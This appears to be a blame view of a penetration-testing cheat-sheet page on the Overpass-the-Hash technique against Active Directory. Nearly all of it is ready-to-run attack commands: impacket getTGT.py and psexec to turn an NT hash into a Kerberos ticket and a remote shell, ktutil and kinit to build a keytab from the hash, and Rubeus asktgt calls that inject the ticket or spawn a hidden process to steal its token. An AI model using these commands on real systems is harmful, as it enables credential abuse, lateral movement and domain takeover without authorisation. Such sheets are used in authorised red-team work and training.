2023-12-04 08:56:01 +00:00
|
|
|
# Hash - OverPass-the-Hash
|
2023-12-03 13:11:10 +00:00
|
|
|
|
2024-10-27 14:29:34 +00:00
|
|
|
> In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT).
|
2023-12-03 13:11:10 +00:00
|
|
|
|
2023-12-04 08:56:01 +00:00
|
|
|
|
2023-12-03 13:11:10 +00:00
|
|
|
### Using impacket
|
|
|
|
|
|
|
|
|
|
```bash
|
|
|
|
|
root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ropnop.com
|
|
|
|
|
root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache"
|
|
|
|
|
root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass
|
|
|
|
|
|
|
|
|
|
root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
|
|
|
|
|
root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
|
|
|
|
|
root@kali:~$ klist
|
|
|
|
|
```
|
|
|
|
|
|
2023-12-04 08:56:01 +00:00
|
|
|
|
2023-12-03 13:11:10 +00:00
|
|
|
### Using Rubeus
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
# Request a TGT as the target user and pass it into the current session
|
|
|
|
|
# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs
|
|
|
|
|
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt
|
|
|
|
|
|
|
|
|
|
# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation)
|
|
|
|
|
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
|
|
|
|
|
```
|
